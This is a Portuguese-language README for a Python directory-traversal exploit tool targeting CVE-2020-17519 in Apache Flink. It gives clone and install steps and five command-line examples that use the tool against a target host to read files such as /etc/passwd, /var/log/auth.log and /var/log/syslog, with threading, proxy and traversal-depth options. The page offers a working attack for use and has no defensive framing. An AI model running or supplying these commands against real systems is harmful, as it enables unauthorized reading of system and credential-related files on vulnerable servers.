
Exploit de travessia de diretório baseado em Python para CVE-2020-17519 (Apache Flink) com multi-threading, suporte a proxy e profundidade configurável para recuperar arquivos de log de alvos vulneráveis.
Uma ferramenta Python que utiliza uma técnica de travessia de diretórios para requisitar arquivos de log de uma URL alvo. Exibe progresso em tempo real, suporta configuração de proxy e, opcionalmente, salva respostas válidas.
requests e pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
A ferramenta pode ser executada a partir da linha de comando com várias opções. Abaixo estão alguns exemplos:
Exemplo 1: Requisitar um Único Caminho de Arquivo
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
Exemplo 2: Requisitar Múltiplos Caminhos de Arquivo a partir de uma Lista
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
Exemplo 3: Executar com Proxy Desabilitado
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
Exemplo 4: Usar uma Lista de Arquivos e Salvar Respostas Válidas
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
Exemplo 5: Requisitar um Único Arquivo com Profundidade Aumentada
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
Para mais detalhes, consulte o código fonte e os comentários inline.